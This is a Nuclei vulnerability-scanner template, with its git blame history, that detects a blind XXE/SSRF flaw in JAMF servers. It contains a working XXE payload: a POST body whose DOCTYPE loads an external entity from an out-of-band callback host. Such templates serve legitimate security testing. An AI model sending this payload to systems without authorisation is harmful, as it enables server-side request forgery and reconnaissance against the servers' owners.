nuclei-templates/http/vulnerabilities/jamf/jamf-blind-xxe.yaml

id: jamf-blind-xxe

info:
  name: JAMF Blind XXE / SSRF
  author: pdteam
  severity: medium
  reference:
    - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
  metadata:
    max-request: 1
  tags: xxe,ssrf,jamf

http:
  - raw:
      - |
        POST /client HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version='1.0' encoding='UTF-8' standalone="no"?>
        <!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
        <ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
          <device>
            <uuid>&test;</uuid>
            <macAddresses />
          </device>
          <application>com.jamfsoftware.jamfdistributionserver</application>
          <messageTimestamp>{{unix_time()}}</messageTimestamp>
          <content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
            <uuid>00000000-0000-0000-0000-000000000000</uuid>
            <commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
            <status>
              <code>1999</code>
              <timestamp>{{unix_time()}}</timestamp>
            </status>
            <commandData>
              <distributionServerInventory>
                <ns2:distributionServerID>34</ns2:distributionServerID>
              </distributionServerInventory>
            </commandData>
          </content>
        </ns2:jamfMessage>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "http"

      - type: word
        words:
          - "com.jamfsoftware.jss"

# digest: 490a0046304402205082713fb5c073803c3d04a52b268789176f5960738fefb81f18cfa22448a6f402202f6090137f99e0c5231988c4c8f7cf70ec1dc256d0833b5da9fced7a55eff231:922c64590222798bb761d5b6d8e72950
Added JAMF Blind XXE 2022-02-01 10:40:51 +00:00			`id: jamf-blind-xxe`

			`info:`
			`name: JAMF Blind XXE / SSRF`
			`author: pdteam`
			`severity: medium`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`reference:`
			`- https://www.synack.com/blog/a-deep-dive-into-xxe-injection/`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: xxe,ssrf,jamf`
Added JAMF Blind XXE 2022-02-01 10:40:51 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Added JAMF Blind XXE 2022-02-01 10:40:51 +00:00			`- raw:`
			`- \|`
			`POST /client HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/xml`

			`<?xml version='1.0' encoding='UTF-8' standalone="no"?>`
			`<!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">`
			`<ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">`
			`<device>`
			`<uuid>&test;</uuid>`
			`<macAddresses />`
			`</device>`
			`<application>com.jamfsoftware.jamfdistributionserver</application>`
			`<messageTimestamp>{{unix_time()}}</messageTimestamp>`
			`<content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">`
			`<uuid>00000000-0000-0000-0000-000000000000</uuid>`
			`<commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>`
			`<status>`
			`<code>1999</code>`
			`<timestamp>{{unix_time()}}</timestamp>`
			`</status>`
			`<commandData>`
			`<distributionServerInventory>`
			`<ns2:distributionServerID>34</ns2:distributionServerID>`
			`</distributionServerInventory>`
			`</commandData>`
			`</content>`
			`</ns2:jamfMessage>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
templateman update 2023-10-14 11:27:55 +00:00			`part: interactsh_protocol # Confirms the DNS Interaction`
Added JAMF Blind XXE 2022-02-01 10:40:51 +00:00			`words:`
			`- "http"`

			`- type: word`
			`words:`
templateman update 2023-10-14 11:27:55 +00:00			`- "com.jamfsoftware.jss"`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402205082713fb5c073803c3d04a52b268789176f5960738fefb81f18cfa22448a6f402202f6090137f99e0c5231988c4c8f7cf70ec1dc256d0833b5da9fced7a55eff231:922c64590222798bb761d5b6d8e72950`